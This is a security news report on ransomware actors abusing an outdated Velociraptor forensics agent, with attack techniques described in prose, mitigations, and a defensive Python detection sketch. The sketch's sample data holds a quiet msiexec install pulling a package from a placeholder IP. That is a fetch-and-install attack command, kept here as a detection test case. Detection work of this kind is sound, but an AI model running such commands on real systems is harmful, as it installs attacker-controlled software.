Cisco Talos has confirmed that ransomware operators are now leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool, to gain stealthy, persistent access and deploy multiple ransomware variants against enterprise environments.
This marks the first definitive linkage between Velociraptor and ransomware operations, underscoring a shift in how threat actors incorporate legitimate security software into their playbooks.
Velociraptor is designed to provide continuous endpoint monitoring across Windows, Linux, and macOS systems by deploying lightweight client agents.
In the observed campaign, adversaries installed an outdated version of Velociraptor (v0.73.4.0) on compromised hosts, exploiting a privilege escalation vulnerability (CVE-2025-6264) to execute arbitrary commands as SYSTEM.
This vulnerable version enabled the actors to maintain long-term, stealthy access even after hosts were isolated by cybersecurity teams.
By deploying Velociraptor without triggering alarms, the attackers executed reconnaissance commands, manipulated scheduled tasks, and disabled critical Microsoft Defender features to avoid detection.
Multifaceted Ransomware Deployment
Following initial access, the threat actors deployed a combination of Warlock, LockBit, and Babuk ransomware across VMware ESXi virtual machines and Windows servers.
Warlock ransomware, which emerged in June 2025 and has been closely associated with Storm-2603, appended the extension “.xlockxlock” to encrypted files.
Simultaneously, a Babuk binary targeted ESXi hosts, appending “.babyk” to partially encrypted files. The use of two distinct ransomware families in a single campaign is unusual and raises confidence that Storm-2603 orchestrated the attack.
To exfiltrate sensitive data for double-extortion, the attackers executed a PowerShell script that recursively gathered Office documents under 50 MB, then uploaded them via HTTP PUT requests to a remote server.
The script suppressed progress output by setting $ProgressPreference="SilentlyContinue" and employed randomized sleep intervals to thwart sandbox analysis and evade security alerts.
Talos attributes this campaign with moderate confidence to the China-based threat actor Storm-2603, first identified abusing SharePoint ToolShell vulnerabilities in July 2025.
Indicators include overlapping TTPs—such as use of cmd.exe batch scripts, scheduled tasks, IIS component manipulation for loading malicious .NET assemblies, and Group Policy Object modifications—and the deployment of both Warlock and LockBit ransomware.
Although Babuk had not been previously deployed by Storm-2603, its presence on ESXi systems suggests operational experimentation or tool sharing among ransomware groups.
Limited visibility into the initial intrusion prevented direct observation of ToolShell exploitation. However, the victim’s SharePoint servers were known to be unpatched against those vulnerabilities, making initial access via ToolShell a plausible vector.
Following domain compromise, the attackers created admin accounts synced to Entra ID and accessed the VMware vSphere console, enabling full control over virtual infrastructure.
Mitigations
To defend against similar campaigns, organizations should ensure that Velociraptor agents are updated to the latest secure versions and audited for unauthorized installations.
Patching CVE-2025-6264 and all known ToolShell vulnerabilities on on-premises SharePoint servers is critical.
Security teams should monitor for unexpected Velociraptor client activity, particularly installations initiated via msiexec /q /i commands pointing to untrusted URLs.
Implementing robust endpoint detection and response solutions that can distinguish legitimate from malicious Velociraptor activity is essential.
Regularly reviewing scheduled tasks, Group Policy changes, and PowerShell script executions for anomalous patterns will help identify early signs of compromise.
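As an added illustration, not part of the Talos report, the following Python triage sketch applies two of these checks to constructed sample telemetry: it flags quiet msiexec installs that pull a package from a URL host outside an allowlist, and it audits a Velociraptor agent inventory for agents on unapproved hosts or builds at or below the v0.73.4.0 build named above. The allowlisted host, approved deployment list and sample host names are assumptions; the real version floor should be the vendor's patched release.

```python
"""Triage constructed endpoint telemetry for the Velociraptor abuse patterns described above."""
from urllib.parse import urlparse

# Assumption: the defender's own inventory of approved Velociraptor sources and deployments.
TRUSTED_MSI_HOSTS = {"velociraptor.corp.example"}    # hypothetical allowlisted download host
APPROVED_AGENT_HOSTS = {"srv-dfir01", "srv-dfir02"}   # hosts where the IR team deployed agents
OBSERVED_OUTDATED = (0, 73, 4, 0)                      # v0.73.4.0, the outdated build in the report

def parse_version(text):
    """'v0.73.4.0' -> (0, 73, 4, 0)."""
    return tuple(int(p) for p in text.lstrip("vV").split("."))

def flag_msiexec(cmdline):
    """Return a reason if cmdline is a quiet msiexec install from an untrusted URL, else None."""
    tokens = cmdline.split()
    if not tokens or tokens[0].lower().split("\\")[-1] not in ("msiexec", "msiexec.exe"):
        return None
    lowered = [t.lower() for t in tokens]
    quiet = any(t.startswith(("/q", "-q")) for t in lowered)      # /q, /qn, /quiet ...
    if not quiet or "/i" not in lowered:
        return None
    idx = lowered.index("/i") + 1                                  # package argument follows /i
    package = tokens[idx] if idx < len(tokens) else ""
    url = urlparse(package)
    if url.scheme in ("http", "https") and url.hostname not in TRUSTED_MSI_HOSTS:
        return f"quiet msiexec install from untrusted URL host {url.hostname}"
    return None

def audit_agent(host, version):
    """Flag Velociraptor agents on unapproved hosts or running the outdated build (or older)."""
    reasons = []
    if host not in APPROVED_AGENT_HOSTS:
        reasons.append("agent present on host not in approved deployment list")
    if parse_version(version) <= OBSERVED_OUTDATED:
        reasons.append(f"agent version {version} is at or below the outdated v0.73.4.0")
    return reasons

# Constructed sample data (not real telemetry); hosts and URLs are placeholders.
SAMPLE_CMDLINES = [
    "msiexec /q /i https://203.0.113.10/agent.msi",                # untrusted URL -> flagged
    "msiexec /q /i https://velociraptor.corp.example/agent.msi",  # allowlisted -> not flagged
    r"msiexec /i C:\temp\agent.msi",                              # interactive, local -> not flagged
]
SAMPLE_AGENTS = [("srv-dfir01", "v0.75.0.0"), ("fileserver03", "0.73.4.0")]

if __name__ == "__main__":
    for cmd in SAMPLE_CMDLINES:
        print(cmd, "->", flag_msiexec(cmd))
    for host, ver in SAMPLE_AGENTS:
        print(host, ver, "->", audit_agent(host, ver))
```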
For further guidance, refer to Cisco Talos’ Ransomware Primer and ToolShell patching recommendations, as well as community resources on detecting Velociraptor misuse.